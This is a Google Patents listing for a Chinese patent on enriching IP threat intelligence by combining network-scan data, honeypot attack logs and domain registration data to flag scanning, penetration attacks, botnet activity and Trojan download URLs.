CN115883258B - IP information processing method, device, electronic equipment and storage medium - Google Patents
IP information processing method, device, electronic equipment and storage medium Download PDFInfo
- Publication number
- CN115883258B CN115883258B CN202310114335.5A CN202310114335A CN115883258B CN 115883258 B CN115883258 B CN 115883258B CN 202310114335 A CN202310114335 A CN 202310114335A CN 115883258 B CN115883258 B CN 115883258B
- Authority
- CN
- China
- Prior art keywords
- information data
- attack
- attacker
- target
- port
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Classifications
-
- Y—GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
- Y02—TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
- Y02D—CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
- Y02D30/00—Reducing energy consumption in communication networks
- Y02D30/50—Reducing energy consumption in communication networks in wire-line communication networks, e.g. low power modes or reduced link rate
Landscapes
- Computer And Data Communications (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
The application provides an IP information processing method, an IP information processing device, electronic equipment and a storage medium, wherein the IP information processing method comprises the steps of acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an Internet honeypot system; and analyzing the service information data based on the IP port, the IP attack information data and the IP basic information data to generate IP context information. The method and the device can generate more comprehensive IP context information and improve the accuracy of the IP context information.
Description
Technical Field
The present invention relates to the field of computer technologies, and in particular, to an IP information processing method, an apparatus, an electronic device, and a storage medium.
Background
With recent years, the field of network security is increasingly receiving importance from countries and society. A large number of attackers in the internet use a vulnerability scanning tool (vulnerability scanning tool: judging whether a vulnerability exists in a target IP service) to scan services in the IP internet of the whole network, thereby obtaining IP context information.
However, the IP context information in the prior art has the disadvantages of incomplete and low accuracy.
Disclosure of Invention
An object of an embodiment of the present application is to provide an IP information processing method, apparatus, electronic device, and storage medium, which are used to generate more comprehensive IP context information and improve the accuracy of the IP context information.
In a first aspect, the present invention provides an IP information processing method, the method including:
acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an Internet honeypot system;
and analyzing the service information data based on the IP port, the IP attack information data and the IP basic information data to generate IP context information.
In the first aspect of the present application, by acquiring IP port service information data, IP attack information data, and IP basic information data, where the IP port service information data is collected by a network space exploration system, and the IP attack information data is collected by an internet honeypot system, analysis can be further performed on the IP port service information data, the IP attack information data, and the IP basic information data, so as to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and higher in accuracy.
In an alternative embodiment, the IP attack information data includes: the method comprises the steps of an attacker source IP, an attacker source port, an attacker HTTP request method, an attacker attack target service type, an attacker attack target port, an attacker HTTP request userAgent, an attacker request URL address and an attacker sent POST packet value;
and, the IP port service information data includes: the port opened by the target IP, response packet details, service names and version information;
and the IP basic information data comprises the geographic position of the target IP, the domain name resolved by the target IP, the domain name registrant of the domain name resolved by the target IP and the mailbox of the domain name resolved by the target IP.
In the above alternative embodiment, the more comprehensive and more accurate IP context information may be generated by the data such as the source IP of the attacker, the source port of the attacker, the HTTP request method of the attacker, the target service type of the attacker attack, the target port of the attacker attack, and the like.
In an alternative embodiment, after the acquiring the IP port service information data, the IP attack information data, and the IP basic information data, before the analyzing the IP port service information data, the IP attack information data, and the IP basic information data to generate the IP context information, the method further includes:
and associating and storing the IP port service information data, the IP attack information data and the IP basic information data through unique IP addresses.
In the above optional embodiment, the IP port service information data, the IP attack information data, and the IP basic information data may be associated and stored by a unique IP address, so that IP analysis efficiency may be improved.
In an alternative embodiment, the analyzing the IP port service information data, the IP attack information data, and the IP base information data to generate IP context information includes:
matching URL addresses based on the value of the POST packet sent by the attacker, and obtaining a first URL address set;
filtering normal websites in the first URL address set based on a white list to obtain a second URL address set;
downloading a file associated with each URL address in the second URL address set;
scanning each URL address-associated file based on an antivirus engine, wherein if a scanning result indicates that the URL address-associated file is a malicious file, storing the URL address into a Trojan downloading address field of a current IP address, and storing a Hash value of the malicious file and the scanning result into a sample set;
comparing the value of the POST packet sent by the attacker with a preset vulnerability characteristic, marking the vulnerability type of the current IP address if the value of the POST packet sent by the attacker hits the preset vulnerability characteristic, and determining that the current IP address has penetration attack;
judging whether the HTTP request method of the attacker is GET or not, and comparing the IP attack information data with vulnerability characteristics;
when the HTTP request method of the attacker is GET and the comparison result represents that character features of the exploit do not exist in the IP attack information, determining that scanning attack exists in the current IP address.
In the above optional implementation manner, based on that the value of the POST packet sent by the attacker matches with the URL address, a first URL address set can be obtained, and then a normal web address in the first URL address set is filtered based on a white list, a second URL address set can be obtained, and then a file associated with each URL address in the second URL address set can be downloaded, and further each file associated with the URL address can be scanned based on an antivirus engine, where if the scanning result indicates that the file associated with the URL address is a malicious file, the URL address is stored in a Trojan download address field of a current IP address, and a Hash value of the malicious file and the scanning result are stored in a sample set. On the other hand, by comparing the value of the POST packet sent by the attacker with the preset vulnerability characteristics, when the value of the POST packet sent by the attacker hits the preset vulnerability characteristics, the vulnerability type of the current IP address can be marked, and it is determined that the current IP address has penetration attack. In still another aspect, by determining whether the HTTP request method of the attacker is GET, and comparing the IP attack information data with the vulnerability feature, when the HTTP request method of the attacker is GET, and the comparison result characterizes that the character feature of the exploit does not exist in the IP attack information, it can be determined that the current IP address has a scanning attack.
In an alternative embodiment, the analyzing the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information further includes:
judging whether the number of userAgents of the HTTP requests of the attacker is more than 5, if so, determining that the attacker has automatic scanning attack with hiding capability;
judging whether the userAgents of the HTTP requests of the attacker have botnet character features, and if so, carrying out botnet family marking on the current IP address.
In the above optional embodiment, by determining whether the number of userragent of HTTP requests of the attacker is greater than 5, it is further possible to determine that the attacker has an automated scanning attack with hiding capability. On the other hand, by judging whether the userAgents of the HTTP requests of the attacker have botnet character features, the current IP address can be further marked with botnet families.
In an alternative embodiment, the analyzing the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information further includes:
judging whether the port opened by the target IP is a 22 port, if so, determining that the current IP address is the IP address of the linux server;
and judging whether the port opened by the target IP is a 3389 port, if so, determining that the current IP address is the IP address of the windows server.
In the above alternative embodiment, by determining whether the port opened by the target IP is a 22 port, it is further possible to determine that the current IP address is the IP address of the linux server. On the other hand, by judging whether the port opened by the target IP is a 3389 port, it is further possible to determine that the current IP address is the IP address of the windows server.
In an alternative embodiment, the analyzing the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information further includes:
judging whether the target IP resolved domain name, the domain name registrant of the target IP resolved domain name and the mailbox of the target IP resolved domain name have data or not, and if so, storing the target IP resolved domain name, the domain name registrant of the target IP resolved domain name and the mailbox of the target IP resolved domain name.
In the above optional embodiment, by determining whether the target IP resolved domain name, the domain name registrant of the target IP resolved domain name, and the mailbox of the target IP resolved domain name have data, the target IP resolved domain name, the domain name registrant of the target IP resolved domain name, and the mailbox of the target IP resolved domain name may be stored.
In a second aspect, the present invention provides an IP information processing apparatus comprising:
the acquisition module is used for acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by the network space detection system, and the IP attack information data is acquired by the Internet honeypot system;
and the analysis module is used for analyzing the service information data based on the IP port, the IP attack information data and the IP basic information data to generate IP context information.
The device of the second aspect of the present application is capable of acquiring IP port service information data, IP attack information data, and IP basic information data by executing an IP information processing method, where the IP port service information data is acquired by a network space exploration system, and the IP attack information data is acquired by an internet honeypot system, so that analysis can be performed on the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and higher in accuracy.
In a third aspect, the present invention provides an electronic device comprising:
a processor; and
a memory configured to store machine readable instructions that, when executed by the processor, perform the IP information processing method of any of the preceding embodiments.
The electronic device of the third aspect of the present invention is capable of acquiring IP port service information data, IP attack information data, and IP basic information data by executing an IP information processing method, where the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an internet honeypot system, so that analysis can be performed on the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and higher in accuracy.
In a fourth aspect, the present invention provides a storage medium storing a computer program that is executed by a processor to perform the IP information processing method according to any one of the foregoing embodiments.
The fourth side storage medium can acquire IP port service information data, IP attack information data and IP basic information data by executing an IP information processing method, wherein the IP port service information data is acquired by a network space detection system, the IP attack information data is acquired by an Internet honeypot system, and further analysis can be performed on the IP port service information data, the IP attack information data and the IP basic information data so as to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and higher in accuracy.
Drawings
In order to more clearly illustrate the technical solutions of the embodiments of the present application, the drawings that are needed in the embodiments of the present application will be briefly described below, it should be understood that the following drawings only illustrate some embodiments of the present application and should not be considered as limiting the scope, and other related drawings may be obtained according to these drawings without inventive effort for a person skilled in the art.
Fig. 1 is a schematic flow chart of an IP information processing method disclosed in an embodiment of the present application;
fig. 2 is a schematic structural diagram of an IP information processing apparatus disclosed in an embodiment of the present application;
fig. 3 is a schematic structural diagram of an electronic device according to an embodiment of the present application.
Detailed Description
The technical solutions in the embodiments of the present application will be described below with reference to the drawings in the embodiments of the present application.
Example 1
Referring to fig. 1, fig. 1 is a flow chart of an IP information processing method disclosed in an embodiment of the present application, and as shown in fig. 1, the method in the embodiment of the present application includes the following steps:
101. acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an Internet honeypot system;
102. the IP port-based service information data, the IP attack information data, and the IP base information data are analyzed to generate IP context information.
In the embodiment of the application, the IP port service information data, the IP attack information data and the IP basic information data are acquired, wherein the IP port service information data are acquired by the network space detection system, the IP attack information data are acquired by the Internet honeypot system, and further the IP port service information data, the IP attack information data and the IP basic information data can be analyzed to generate the IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and higher in accuracy.
In this embodiment of the present application, for step 101, the acquired IP port service information data, IP attack information data, and IP basic information data include data related to a plurality of IP addresses, for example, IP port service information data, IP attack information data, and IP basic information data including IP address a, and also include IP port service information data, IP attack information data, and IP basic information data of IP address B.
In the embodiment of the present application, for step 101, please refer to the prior art for the related description of the network space detection system, which is not repeated herein. On the other hand, referring to the prior art for the internet honeypot system, the embodiments of the present application will not be described in detail.
In the embodiment of the present application, the IP context information refers to the result obtained by analyzing the IP port service information data, the IP attack information data, and the IP base information data, for example, in the analysis process of scanning the file associated with each URL address based on the antivirus engine,
if the scanning result indicates that the file associated with the URL address is a malicious file, the IP context information comprises a Trojan download address field, wherein the Trojan download address field points to the URL address capable of downloading the malicious file.
In this embodiment of the present application, as an optional implementation manner, the IP attack information data includes: the method comprises the steps of source IP of an attacker, source port of the attacker, HTTP request method of the attacker, target service type of the attacker attack, target port of the attacker attack, userAgent of HTTP request of the attacker, URL address of the attacker request and value of POST packet sent by the attacker. In another aspect, the IP port service information data includes: the port opened by the target IP, response packet details, service name and version information. In yet another aspect, the IP underlying information data includes a geographic location of the target IP, a domain name of the target IP resolution, a domain name registrant of the domain name of the target IP resolution, and a mailbox of the domain name of the target IP resolution.
In the above alternative embodiment, the more comprehensive and more accurate IP context information may be generated by the data such as the source IP of the attacker, the source port of the attacker, the HTTP request method of the attacker, the target service type of the attacker attack, the target port of the attacker attack, and the like.
In the above alternative embodiment, the IP base information data may be provided by a third party platform.
In an alternative embodiment, at step 101: after obtaining the IP port service information data, the IP attack information data, and the IP basic information data, step 102: before analyzing the service information data based on the IP port, the IP attack information data and the IP basic information data to generate the IP context information, the method according to the embodiment of the present application further includes the following steps:
the IP port service information data, the IP attack information data and the IP basic information data are associated and stored through the unique IP address.
In the above alternative embodiment, the IP port service information data, the IP attack information data, and the IP basic information data are associated and stored by a unique IP address, so that the IP analysis efficiency can be improved.
In the above alternative embodiment, associating and storing the IP port service information data, the IP attack information data, and the IP basic information data by unique IP addresses means associating data belonging to the same IP address under one IP address, for example, assuming that there are two data records, which are the IP port service information data A, IP port service information data B, respectively, if the IP address of the IP port service information data B is the IP address in the IP port service information data a, the IP port service information data A, IP port service information data B are associated together, that is, associating the two data records by IP addresses.
In the first aspect of the present application, as an optional implementation manner, step 102: analyzing the IP port based service information data, the IP attack information data and the IP base information data to generate IP context information, comprising the sub-steps of:
matching URL addresses based on the value of the POST packet sent by an attacker, and obtaining a first URL address set;
filtering normal websites in the first URL address set based on the white list to obtain a second URL address set;
downloading a file associated with each URL address in the second URL address set;
scanning each URL address-associated file based on an antivirus engine, wherein if the scanning result indicates that the URL address-associated file is a malicious file, storing the URL address into a Trojan download address field of a current IP address, and storing a Hash value and the scanning result of the malicious file into a sample set;
comparing the value of the POST packet sent by the attacker with a preset vulnerability feature, marking the vulnerability type of the current IP address if the value of the POST packet sent by the attacker hits the preset vulnerability feature, and determining that the current IP address has penetration attack;
judging whether the HTTP request method of the attacker is GET or not, and comparing the IP attack information data with the vulnerability characteristics;
when the HTTP request method of the attacker is GET and the comparison result represents that character features of the exploit do not exist in the IP attack information, it is determined that scanning attack exists in the current IP address.
In the above optional embodiment, the value of the POST packet sent by the attacker is matched with the URL address, so that a first URL address set can be obtained, and then a normal website in the first URL address set is filtered based on the white list, a second URL address set can be obtained, and then a file associated with each URL address in the second URL address set can be downloaded, and further a file associated with each URL address can be scanned based on the antivirus engine, wherein if the scanning result indicates that the file associated with the URL address is a malicious file, the URL address is stored in a Trojan download address field of the current IP address, and the Hash value and the scanning result of the malicious file are stored in a sample set. On the other hand, by comparing the value of the POST packet sent by the attacker with the preset vulnerability characteristics, when the value of the POST packet sent by the attacker hits the preset vulnerability characteristics, the vulnerability type of the current IP address can be marked, and it is determined that the current IP address has penetration attack. In still another aspect, by judging whether the HTTP request method of the attacker is GET, and comparing the IP attack information data with the vulnerability feature, when the HTTP request method of the attacker is GET, and the comparison result characterizes that the character feature of the vulnerability utilization is not present in the IP attack information, it can be determined that the current IP address has a scanning attack.
In the embodiment of the present application, as an optional implementation manner, step 102: analyzing the service information data based on the IP port, the IP attack information data and the IP basic information data to generate IP context information, and further comprising the following sub-steps:
judging whether the user agents of the HTTP requests of the attacker are more than 5, if so, determining that the attacker has automatic scanning attack with hiding capability;
judging whether the userAgents of the HTTP requests of the attacker have botnet character features, and if so, marking the current IP address with botnet family.
In the above alternative embodiment, by determining whether the userragent of the HTTP request of the attacker is greater than 5, it is further possible to determine that the attacker has an automated scanning attack with hiding capability. On the other hand, by judging whether the userAgents of the HTTP requests of the attacker have botnet character features, the current IP address can be marked with the botnet family.
In the alternative embodiment described above, as an example, the current IP address may be marked as one of the Mirai family, the king botnet family.
In the embodiment of the present application, as an optional implementation manner, step 102: analyzing the IP port based service information data, the IP attack information data and the IP base information data to generate IP context information, further comprising the steps of:
judging whether the port opened by the target IP is a 22 port, if so, determining that the current IP address is the IP address of the linux server;
and judging whether the port opened by the target IP is a 3389 port, if so, determining that the current IP address is the IP address of the windows server.
In the above alternative embodiment, whether the port opened by the target IP is a 22 port is determined, so that the current IP address can be determined as the IP address of the linux server. On the other hand, by judging whether the port opened by the target IP is the 3389 port, it is possible to determine that the current IP address is the IP address of the windows server. It should be noted that, in the above alternative embodiment, 22 ports are used to perform ssh services.
In the embodiment of the present application, as an optional implementation manner, step 102: analyzing the IP port based service information data, the IP attack information data and the IP base information data to generate IP context information, further comprising the steps of:
judging whether the data exists in the domain name resolved by the target IP, the domain name registrant of the domain name resolved by the target IP and the mailbox of the domain name resolved by the target IP, if so, storing the domain name resolved by the target IP, the domain name registrant of the domain name resolved by the target IP and the mailbox of the domain name resolved by the target IP.
In the above-mentioned alternative embodiment, by determining whether the target IP-resolved domain name, the domain name registrant of the target IP-resolved domain name, and the mailbox of the target IP-resolved domain name have data, the target IP-resolved domain name, the domain name registrant of the target IP-resolved domain name, and the mailbox of the target IP-resolved domain name may be stored.
In an embodiment of the present application, as an optional implementation manner, the method of the embodiment of the present application further includes the following steps:
the IP context information is shown.
Example two
Referring to fig. 2, fig. 2 is a schematic structural diagram of an IP information processing apparatus according to an embodiment of the present application, and as shown in fig. 2, the apparatus according to the embodiment of the present application includes the following functional modules:
the acquisition module 201 is configured to acquire IP port service information data, IP attack information data, and IP basic information data, where the IP port service information data is acquired by the network space detection system, and the IP attack information data is acquired by the internet honeypot system;
the analysis module 202 is configured to analyze the IP port service information data, the IP attack information data, and the IP base information data to generate IP context information.
The device of the embodiment of the application can acquire the IP port service information data, the IP attack information data and the IP basic information data by executing the IP information processing method, wherein the IP port service information data is acquired by the network space detection system, the IP attack information data is acquired by the Internet honeypot system, and further the IP port service information data, the IP attack information data and the IP basic information data can be analyzed to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and higher in accuracy.
Example III
Referring to fig. 3, fig. 3 is a schematic structural diagram of an electronic device disclosed in an embodiment of the present application, and as shown in fig. 3, the electronic device in the embodiment of the present application includes:
a processor 301; and
a memory 302 configured to store machine readable instructions that, when executed by the processor 301, perform the IP information processing method as in any of the previous embodiments.
The electronic device in the embodiment of the application can acquire the IP port service information data, the IP attack information data and the IP basic information data by executing the IP information processing method, wherein the IP port service information data is acquired by the network space detection system, the IP attack information data is acquired by the Internet honeypot system, and further the IP port service information data, the IP attack information data and the IP basic information data can be analyzed to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and higher in accuracy.
Example IV
The present embodiment provides a storage medium storing a computer program that is executed by a processor to perform the IP information processing method according to any one of the foregoing embodiments.
The storage medium of the embodiment of the application can acquire the IP port service information data, the IP attack information data and the IP basic information data by executing the IP information processing method, wherein the IP port service information data is acquired by the network space detection system, the IP attack information data is acquired by the Internet honeypot system, and further the IP port service information data, the IP attack information data and the IP basic information data can be analyzed to generate IP context information. Compared with the prior art, the IP context information is generated based on the IP port service information data, the IP attack information data and the IP basic information data, so that the method is more comprehensive and higher in accuracy.
In the embodiments provided in the present application, it should be understood that the disclosed apparatus and method may be implemented in other manners. The above-described apparatus embodiments are merely illustrative, for example, the division of units is merely a logical function division, and there may be other manners of division in actual implementation, and for example, multiple units or components may be combined or integrated into another system, or some features may be omitted, or not performed. Alternatively, the coupling or direct coupling or communication connection shown or discussed with each other may be through some communication interface, device or unit indirect coupling or communication connection, which may be in electrical, mechanical or other form.
Further, the units described as separate units may or may not be physically separate, and units displayed as units may or may not be physical units, may be located in one place, or may be distributed over a plurality of network units. Some or all of the units may be selected according to actual needs to achieve the purpose of the solution of this embodiment.
Furthermore, functional modules in various embodiments of the present application may be integrated together to form a single portion, or each module may exist alone, or two or more modules may be integrated to form a single portion.
It should be noted that the functions, if implemented in the form of software functional modules and sold or used as a stand-alone product, may be stored in a computer-readable storage medium. Based on such understanding, the technical solution of the present application may be embodied essentially or in a part contributing to the prior art or in a part of the technical solution, in the form of a software product stored in a storage medium, including several instructions for causing a computer device (which may be a personal computer, a server, or a network device, etc.) to perform all or part of the steps of the methods of the embodiments of the present application. And the aforementioned storage medium includes: a U-disk, a removable hard disk, a Read-only memory (ROM) random access memory (Random Access Memory, RAM), a magnetic disk, or an optical disk, or other various media capable of storing program codes.
In this document, relational terms such as first and second, and the like may be used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions.
The above is only an example of the present application, and is not intended to limit the scope of the present application, and various modifications and variations will be apparent to those skilled in the art. Any modification, equivalent replacement, improvement, etc. made within the spirit and principles of the present application should be included in the protection scope of the present application.
Claims (10)
1. An IP information processing method, the method comprising:
acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by a network space detection system, and the IP attack information data is acquired by an Internet honeypot system;
analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information;
and, the IP attack information data includes: the method comprises the steps of an attacker source IP, an attacker source port, an attacker HTTP request method, an attacker attack target service type, an attacker attack target port, an attacker HTTP request userAgent, an attacker request URL address and an attacker sent POST packet value;
and, the IP port service information data includes: the port opened by the target IP, response packet details, service names and version information;
the IP basic information data comprises the geographic position of the target IP, the domain name resolved by the target IP, a domain name registrant of the domain name resolved by the target IP and a mailbox of the domain name resolved by the target IP;
and analyzing the IP port service information data, the IP attack information data, and the IP base information data to generate IP context information, including:
matching URL addresses based on the value of the POST packet sent by the attacker, and obtaining a first URL address set;
filtering normal websites in the first URL address set based on a white list to obtain a second URL address set;
downloading a file associated with each URL address in the second URL address set;
and scanning each file associated with the URL address based on an antivirus engine, wherein if a scanning result indicates that the file associated with the URL address is a malicious file, storing the URL address into a Trojan downloading address field of a current IP address, and storing a Hash value of the malicious file and the scanning result into a sample set.
2. The method of claim 1, wherein after the obtaining the IP port service information data, the IP attack information data, and the IP base information data, the analyzing the IP port service information data, the IP attack information data, and the IP base information data to generate the IP context information, the method further comprises:
and associating and storing the IP port service information data, the IP attack information data and the IP basic information data through unique IP addresses.
3. The method of claim 2, wherein the analyzing the IP port service information data, the IP attack information data, and the IP base information data to generate IP context information further comprises:
comparing the value of the POST packet sent by the attacker with a preset vulnerability characteristic, marking the vulnerability type of the current IP address if the value of the POST packet sent by the attacker hits the preset vulnerability characteristic, and determining that the current IP address has penetration attack.
4. The method of claim 2, wherein the analyzing the IP port service information data, the IP attack information data, and the IP base information data to generate IP context information further comprises:
judging whether the HTTP request method of the attacker is GET or not, and comparing the IP attack information data with vulnerability characteristics;
when the HTTP request method of the attacker is GET and the comparison result represents that the character features of the exploit do not exist in the IP attack information, the scanning attack of the current IP address is determined.
5. The method of claim 2, wherein the analyzing the IP port service information data, the IP attack information data, and the IP base information data to generate IP context information further comprises:
judging whether the number of userAgents of the HTTP requests of the attacker is more than 5, if so, determining that the attacker has automatic scanning attack with hiding capability;
judging whether the userAgents of the HTTP requests of the attacker have botnet character features, and if so, marking the current IP address with botnet family.
6. The method of claim 2, wherein the analyzing the IP port service information data, the IP attack information data, and the IP base information data to generate IP context information further comprises:
judging whether the port opened by the target IP is a 22 port or not, if so, determining that the current IP address is the IP address of the linux server;
and judging whether the port opened by the target IP is a 3389 port, if so, determining that the current IP address is the IP address of the windows server.
7. The method of claim 2, wherein the analyzing the IP port service information data, the IP attack information data, and the IP base information data to generate IP context information further comprises:
judging whether the target IP resolved domain name, the domain name registrant of the target IP resolved domain name and the mailbox of the target IP resolved domain name have data or not, and if so, storing the target IP resolved domain name, the domain name registrant of the target IP resolved domain name and the mailbox of the target IP resolved domain name.
8. An IP information processing apparatus, characterized in that the apparatus comprises:
the acquisition module is used for acquiring IP port service information data, IP attack information data and IP basic information data, wherein the IP port service information data is acquired by the network space detection system, and the IP attack information data is acquired by the Internet honeypot system;
the analysis module is used for analyzing the IP port service information data, the IP attack information data and the IP basic information data to generate IP context information;
and, the IP attack information data includes: the method comprises the steps of an attacker source IP, an attacker source port, an attacker HTTP request method, an attacker attack target service type, an attacker attack target port, an attacker HTTP request userAgent, an attacker request URL address and an attacker sent POST packet value;
and, the IP port service information data includes: the port opened by the target IP, response packet details, service names and version information;
the IP basic information data comprises the geographic position of the target IP, the domain name resolved by the target IP, a domain name registrant of the domain name resolved by the target IP and a mailbox of the domain name resolved by the target IP;
and the analysis module performs the analysis on the IP port service information data, the IP attack information data, and the IP basic information data to generate IP context information in the following specific manner:
matching URL addresses based on the value of the POST packet sent by the attacker, and obtaining a first URL address set;
filtering normal websites in the first URL address set based on a white list to obtain a second URL address set;
downloading a file associated with each URL address in the second URL address set;
and scanning each file associated with the URL address based on an antivirus engine, wherein if a scanning result indicates that the file associated with the URL address is a malicious file, storing the URL address into a Trojan downloading address field of a current IP address, and storing a Hash value of the malicious file and the scanning result into a sample set.
9. An electronic device, comprising:
a processor; and
a memory configured to store machine readable instructions that, when executed by the processor, perform the IP information processing method of any of claims 1-7.
10. A storage medium storing a computer program which, when executed by a processor, implements the IP information processing method according to any one of claims 1 to 7.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202310114335.5A CN115883258B (en) | 2023-02-15 | 2023-02-15 | IP information processing method, device, electronic equipment and storage medium |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202310114335.5A CN115883258B (en) | 2023-02-15 | 2023-02-15 | IP information processing method, device, electronic equipment and storage medium |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN115883258A CN115883258A (en) | 2023-03-31 |
| CN115883258B true CN115883258B (en) | 2023-08-01 |
Family
ID=85761149
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202310114335.5A Active CN115883258B (en) | 2023-02-15 | 2023-02-15 | IP information processing method, device, electronic equipment and storage medium |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN115883258B (en) |
Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| JP2010021977A (en) * | 2008-06-13 | 2010-01-28 | Panasonic Corp | Method, system, and device for network signaling |
| CN110149350A (en) * | 2019-06-24 | 2019-08-20 | 国网安徽省电力有限公司信息通信分公司 | A kind of associated assault analysis method of alarm log and device |
| CN114667532A (en) * | 2018-10-15 | 2022-06-24 | 贝宝公司 | Multidimensional drift nuance intelligence threat engine |
Family Cites Families (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN115086330B (en) * | 2022-06-14 | 2024-03-01 | 亚信科技(中国)有限公司 | Cross-cluster load balancing system |
| CN115277102B (en) * | 2022-06-29 | 2023-04-07 | 北京天融信网络安全技术有限公司 | Network attack detection method and device, electronic equipment and storage medium |
-
2023
- 2023-02-15 CN CN202310114335.5A patent/CN115883258B/en active Active
Patent Citations (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| JP2010021977A (en) * | 2008-06-13 | 2010-01-28 | Panasonic Corp | Method, system, and device for network signaling |
| CN114667532A (en) * | 2018-10-15 | 2022-06-24 | 贝宝公司 | Multidimensional drift nuance intelligence threat engine |
| CN110149350A (en) * | 2019-06-24 | 2019-08-20 | 国网安徽省电力有限公司信息通信分公司 | A kind of associated assault analysis method of alarm log and device |
Also Published As
| Publication number | Publication date |
|---|---|
| CN115883258A (en) | 2023-03-31 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US8359651B1 (en) | Discovering malicious locations in a public computer network | |
| CN110730175B (en) | Botnet detection method and detection system based on threat information | |
| Huber et al. | Social snapshots: Digital forensics for online social networks | |
| CN110099059B (en) | Domain name identification method and device and storage medium | |
| CN107347076B (en) | SSRF vulnerability detection method and device | |
| CN111104395B (en) | Database auditing method, equipment, storage medium and device | |
| CN111818103A (en) | Traffic-based tracing attack path method in network target range | |
| CN113259392A (en) | Network security attack and defense method, device and storage medium | |
| CN113923003A (en) | Attacker portrait generation method, system, equipment and medium | |
| CN110768949B (en) | Vulnerability detection method and device, storage medium and electronic device | |
| CN109309665B (en) | Access request processing method and device, computing device and storage medium | |
| CN112751804A (en) | Method, device and equipment for identifying counterfeit domain name | |
| CN110837646A (en) | Risk investigation device of unstructured database | |
| CN115865525B (en) | Log data processing method, device, electronic equipment and storage medium | |
| US20130275384A1 (en) | System, method, and computer program product for determining whether an electronic mail message is unwanted based on processing images associated with a link in the electronic mail message | |
| CN115883258B (en) | IP information processing method, device, electronic equipment and storage medium | |
| CN116455620A (en) | Malicious domain name access analysis and determination method | |
| CN115314271B (en) | Access request detection method, system and computer storage medium | |
| CN116015800A (en) | Scanner identification method and device, electronic equipment and storage medium | |
| CN113364780B (en) | Network attack victim determination method, equipment, storage medium and device | |
| CN113965392B (en) | Malicious server detection method, system, readable medium and electronic equipment | |
| CN115913634A (en) | Network security abnormity detection method and system based on deep learning | |
| JP5639535B2 (en) | Benign domain name exclusion device, benign domain name exclusion method, and program | |
| CN111371917B (en) | Domain name detection method and system | |
| CN115102785A (en) | Automatic tracing system and method for network attack |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |